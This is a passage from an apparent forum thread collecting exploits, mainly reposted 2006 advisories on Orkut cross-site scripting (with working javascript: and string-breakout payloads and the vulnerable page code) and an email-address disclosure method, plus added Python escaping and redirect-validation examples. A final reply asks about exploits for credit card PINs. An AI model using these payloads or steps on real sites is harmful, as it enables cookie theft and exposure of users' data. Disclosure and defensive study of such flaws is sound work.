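    for template, payload in ((SEARCH_BOX, ATTR_BREAKOUT), (COMMENT, SCRIPT_TAG)):
        print("raw     :", injected(template, render_vulnerable(template, payload)))
        print("escaped :", injected(template, render_hardened(template, payload)))
```

`html.escape(..., quote=True)` covers both contexts used here because it encodes `<`, `>`, `&`, `"` and `'`; reflecting into a JavaScript string, a URL or an unquoted attribute needs a different encoder, which is the distinction the Orkut `nid` case later in the thread turns on.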

ddlmail

Orkut Multiple Cross Site Scripting Vulnerabilities
« Reply #57 on: 10 December 2006, 22:05 »

Orkut Multiple Cross Site Scripting Vulnerabilities

#####################################################################

XDisclose Advisory       : XD100092
Vulnerability Discovered: November 18th 2006
Advisory Released        : December 08th 2006
Credit                          : Rajesh Sethumadhavan

Class                          : Cross Site Scripting
                                    HTML Injection
Severity                       : Medium
Solution Status            : Unpatched
Vendor                        : Google Inc
Vendor Website           : http://www.orkut.com
Affected applications    : Orkut Services
Affected Platform         : All

#####################################################################


Overview:
Orkut is an Internet social network service run by Google and named
after its creator, Orkut Büyükkökten. It claims to be designed to
help users meet new friends and maintain existing relationships with
pictures and messages, and establish new ones by reaching out to
people you've never met before.

Orkut service is vulnerable to Cross-Site Scripting and HTML
Injection. This is caused due to improper validation of user-supplied
inputs.

Description:
A remote attacker can craft a GET request with the XSS payload as
demonstrated below. When the victim clicks on the GET request the
payload will get executed, which results in stealing of cookie, IP info,
referer info, browser information, clipboard content, operating system
info, hardware info, modification of page or html injection, url
redirection, port scanning of the network, and even phishing is
possible.

1)Orkut Invite XSS:

  The flaws are due to improper sanitization of inputs passed to
  'continue' parameter in GET request
  -------------------------------------------------------------------
  http://www.orkut.com/Invite.aspx?continue=javascript:alert(document.cookie)
  ------------------------------------------------------------------

Demonstration:
Note: Demonstration leads to your personal information disclosure

- Login to your orkut account
- Paste the above URL
- Click on BACK button
- Orkut Cookies will get displayed

  In a similar way HTML injection is also possible.

  Vulnerable Code:
  ------------------------------------------------------------------

  <td valign="top">
  <table class="btn" border="0" cellpadding="0" cellspacing="0"
  onmouseover="this.className='btnHover'" onmouseout="this.className
  ='btn'">
  <tr style="cursor: pointer;" onclick="window.location='javascript:
  alert(document.cookie)';" id="b0">
  <td><img src="http://images3.orkut.com/img/bl.gif" alt="" /></td>
  <td nowrap style="background: url
  (http://images3.orkut.com/img/bm.gif)">back
  </td>

  ------------------------------------------------------------------

2)Orkut Next page XSS:

  The flaws are due to improper sanitization of inputs passed to the 'nid'
  parameter in a GET request. This vulnerability was already fixed 2 days
  earlier.
  GET request with XSS payload:
  ------------------------------------------------------------------
  http://www.orkut.com/Scrapbook.aspx?uid=3595989687719502785&pageSize
  =&na=3&nst=-2&nid=13550271097807907792-%22};%20alert('Xdisclose');%
  20function%20tt(){//
  ------------------------------------------------------------------

  Vulnerable Code:
  ------------------------------------------------------------------

  function changePageSize(value) {
 window.location="/Scrapbook.aspx?uid=3595989687719502785&na=
 1&nst=1&nid=13550271097807907792-"}; alert('Xdisclose');
 function tt(){//&pageSize="+value;
  }

  ------------------------------------------------------------------


Solution:
Orkut can improve their filters by disallowing certain characters
like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URL.


Screenshot:
http://www.xdisclose.com/Images/xdorkutinvitexss.jpg


Impact:
Successful exploitation allows execution of arbitrary script code in
a user's browser session in the context of an affected site, which results
in stealing of cookie, IP info, referer info, browser information,
clipboard content, operating system info, hardware info,
modification of page or html injection (temporary webpage defacement),
modification of page title, hijacking page flow, url redirection, port
scanning of the victim's network, and even phishing is possible.

Impact of the vulnerability is network level.


Original Advisory:
http://www.xdisclose.com/XD100092.txt


Credits:
Rajesh Sethumadhavan has been credited with the discovery of this
vulnerability


Disclaimer:
This entire document is strictly for educational, testing and
demonstrating purpose only. Modification use and/or publishing this
information is entirely on your own risk. The exploit code is to be
used on your own orkut account. I am not liable for any direct or
indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.

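Both the Yahoo `.done=` / `pref_done=` redirects in reply #48 and the Orkut `continue=javascript:...` parameter in this advisory take a destination from the query string and use it without checking its scheme or host. The validator below is an added Python example, not code from either advisory or either site; `ALLOWED_HOSTS` and the sample values are constructed. It decodes the value once, strips control characters, rejects anything with a scheme other than http(s) (so `javascript:` and `data:` never reach `window.location`), rejects protocol-relative `//host` and embedded `scheme://` forms, and only lets an absolute URL through when its real host is on the site's own allowlist.

```python
from urllib.parse import unquote, urlsplit

# Constructed allowlist standing in for the site's own hostnames.
ALLOWED_HOSTS = {"mail.example.test", "www.example.test"}
DEFAULT_TARGET = "/"


def safe_redirect_target(raw: str, allowed_hosts=ALLOWED_HOSTS, default: str = DEFAULT_TARGET) -> str:
    """Return the redirect target to use for a user-supplied value, or the safe default."""
    # Decode once (the advisory encoded http%3a//), then drop control characters,
    # which browsers ignore inside a scheme (e.g. "java<TAB>script:").
    candidate = "".join(ch for ch in unquote(raw) if ord(ch) > 0x1F).strip()
    if not candidate:
        return default
    try:
        parts = urlsplit(candidate)
    except ValueError:                      # malformed IPv6 literal and similar
        return default
    scheme = parts.scheme.lower()
    if scheme in ("http", "https"):
        # Absolute URL: only the site's own hosts. A userinfo trick such as
        # http://mail.example.test@evil.test/ fails because hostname is the real host.
        host = (parts.hostname or "").lower()
        return candidate if host in allowed_hosts else default
    if scheme:
        # javascript:, data:, vbscript:, ftp:, file: ... are never valid redirect targets.
        return default
    # Scheme-less value: accept a single-slash, site-relative path only.
    if (candidate.startswith("/")
            and not candidate.startswith("//")
            and "://" not in candidate
            and "\\" not in candidate):
        return candidate
    return default


if __name__ == "__main__":
    for value in ("http%3a//mail.example.test/inbox", "http%3a//www.xdisclose.com",
                  "javascript:alert(document.cookie)", "/**http%3a//www.xdisclose.com",
                  "//www.xdisclose.com/", "/ym/Folders?box=Inbox"):
        print("%-40s -> %s" % (value, safe_redirect_target(value)))
```

The allowlist is keyed on `parts.hostname` rather than on a string prefix: prefix checks are what let `http://mail.example.test@evil.test/` and `http://mail.example.test.evil.test/` through. For a bounce-through parameter like Yahoo's `/**http://` syntax, the path check rejects anything that still embeds `://`.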
ddlmail

Orkut Email Address Disclosure Vulnerability
« Reply #58 on: 10 December 2006, 22:07 »

Orkut Email Address Disclosure Vulnerability

#####################################################################

XDisclose Advisory       : XD100097
Vulnerability Discovered: November 30th 2006
Advisory Released        : December 8th  2006
Credit                          : Rajesh Sethumadhavan

Class                          : Information Disclosure
Severity                       : Highly Critical
Solution Status            : Unpatched
Vendor                        : Google Inc
Vendor Website           : http://www.orkut.com
Affected applications    : Orkut Services
Affected Platform         : All

#####################################################################

Overview:
Orkut is an Internet social network service run by Google and named
after its creator, Orkut Büyükkökten. It claims to be designed to
help users meet new friends and maintain existing relationships with
pictures and messages, and establish new ones by reaching out to
people you've never met before.

Orkut service is vulnerable to an email address disclosure vulnerability.
Due to this it is possible to get the email address of any user in orkut.
This is caused by improper design of the orkut portal.

Description:
A remote attacker can get the email address of anyone in orkut as
demonstrated below. No victim interaction is required at all.

Demonstration:
Note: Demonstration leads to email address information disclosure

- Login to your orkut account
- Add any user as your friend (Person you want to get email address)
- Click 'friends' tab
- Click 'open friend requests' tab
- Click edit button the email address of the user will be displayed
  as in the screenshot

In the same way you can also find your friends' email addresses.


Solution:
Orkut can improve their portal design by hiding users' email addresses.


Screenshot:
http://www.xdisclose.com/images/xdorkutemailid.jpg


Impact:
Successful exploitation allows email address disclosure.


Original Advisory:
http://www.xdisclose.com/XD100097.txt


Credits:
Rajesh Sethumadhavan has been credited with the discovery of this
vulnerability


Disclaimer:
This entire document is strictly for educational, testing and
demonstrating purpose only. Modification use and/or publishing this
information is entirely on your own risk. The exploit code is to be
used on your own orkut account. I am not liable for any direct or
indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.
oxxalanxxo

Re: <-> Compilation of Interesting Exploits (-Updating-)
« Reply #59 on: 31 May 2007, 04:33 »

hi, I'd like to know whether an exploit can be made to get credit card PINs